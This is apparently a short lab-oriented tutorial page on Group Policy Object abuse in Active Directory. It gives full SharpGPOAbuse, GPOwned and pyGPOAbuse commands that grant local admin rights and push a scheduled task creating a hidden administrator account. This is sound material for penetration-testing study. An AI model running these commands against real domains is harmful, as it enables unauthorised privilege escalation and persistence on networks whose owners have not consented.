GPO Attacks
Last updated
Last updated
We discussed the theory behind GPOs here.
To abuse GPOs from windows we mainly use SharpGPOAbuse
--AddUserRights
Add rights to a user
--AddLocalAdmin
Add a user to the local admins group
--AddComputerScript
Add a new computer startup script
--AddUserScript
Configure a user logon script
--AddComputerTask
Configure a computer immediate task
--AddUserTask
Add an immediate task to a user
For example we can use AddLocalAdmin to grant administrative access to a user
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount otter --GPOName "Default Security Policy - WKS"[!info]
--AddLocalAdminoption will overwrite any existing Administrator if this policy is given higher priority. This could create problems if the Administrators or any other options are locally set on the machines, as they will be replaced. It is recommended to experiment with these changes in a controlled environment, such as this lab.
To abuse GPOs from Linux we use pyGPOAbuse.
Before we abuse this GPO, let's create a backup so we can restore it once we are done
python3 GPOwned.py -u otter -p 'SomethingSecure123!' -d domain.com -dc-ip 10.10.10.10 -gpcmachine -backup backupgpo -name "{<GUID>}"Next we can modify the GPO: this tool allowed us to run PowerShell or cmd commands with the options -PowerShell or -command, respectively
python3 pygpoabuse.py domain.com/otter:'SomethingSecure123!' -gpo-id <GPO_ID> -command "net user plaintext Password1234 /add && net localgroup Administrators plaintext /add" -taskname "addAdmin" -description "totally leigt i swear" -dc-ip 10.10.10.10 -v